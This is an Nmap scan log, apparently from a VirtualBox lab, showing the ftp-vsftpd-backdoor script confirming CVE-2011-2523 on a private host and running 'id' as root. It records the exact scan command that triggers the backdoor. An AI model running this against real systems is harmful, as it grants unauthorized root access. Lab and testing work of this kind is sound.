# Nmap 7.95 scan initiated Sun Oct 19 11:29:22 2025 as: /usr/lib/nmap/nmap -p 21 --script=ftp-vsftpd-backdoor -oN 05_nse_ftp_vsftpd.txt 192.168.56.3
Nmap scan report for 192.168.56.3
Host is up (0.00051s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-vsftpd-backdoor: 
|   VULNERABLE:
|   vsFTPd version 2.3.4 backdoor
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2011-2523  BID:48539
|       vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
|     Disclosure date: 2011-07-03
|     Exploit results:
|       Shell command: id
|       Results: uid=0(root) gid=0(root)
|     References:
|       http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|       https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
|       https://www.securityfocus.com/bid/48539
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
MAC Address: 08:00:27:F5:13:0F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

# Nmap done at Sun Oct 19 11:29:36 2025 -- 1 IP address (1 host up) scanned in 14.34 seconds
